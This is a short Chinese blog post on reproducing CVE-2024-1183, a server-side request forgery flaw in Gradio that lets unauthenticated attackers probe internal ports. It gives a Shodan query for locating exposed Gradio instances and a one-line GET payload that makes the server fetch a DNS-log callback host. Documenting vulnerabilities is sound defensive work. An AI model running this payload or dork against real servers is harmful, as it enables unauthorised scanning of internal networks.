本文主要是介绍【漏洞复现】Gradio file SSRF漏洞(CVE-2024-1183),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01 产品简介
Gradio是一个用于创建机器学习模型交互式界面的Python库。它可以帮助用户快速地为模型构建一个可视化的、易于使用的Web界面,无需编写任何Web前端代码。通过Gradio,用户可以定义输入组件和输出组件,以接收用户输入和展示模型的预测结果。此外,Gradio支持多种不同类型的输入(如文本、图像、音频等)和输出(如文本、图像、HTML等),并可以与大多数Python机器学习框架(如TensorFlow、PyTorch等)和常见的数据处理库(如NumPy、Pandas等)无缝集成。
0x02 漏洞概述
Gradio存在SSRF漏洞,未授权的攻击者可以通过该漏洞扫描和识别内部网络中的开放端口,通过操纵GET请求中的"file"参数,攻击者可以根据响应中是否存在"Location"标头或"File not allowed"错误来辨别内部端口的状态。
0x03 测绘语句
shodan:html:"__gradio_mode__"
0x04 漏洞复现
GET /file=http://{{dnslog}} HTTP/1.1
这篇关于【漏洞复现】Gradio file SSRF漏洞(CVE-2024-1183)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!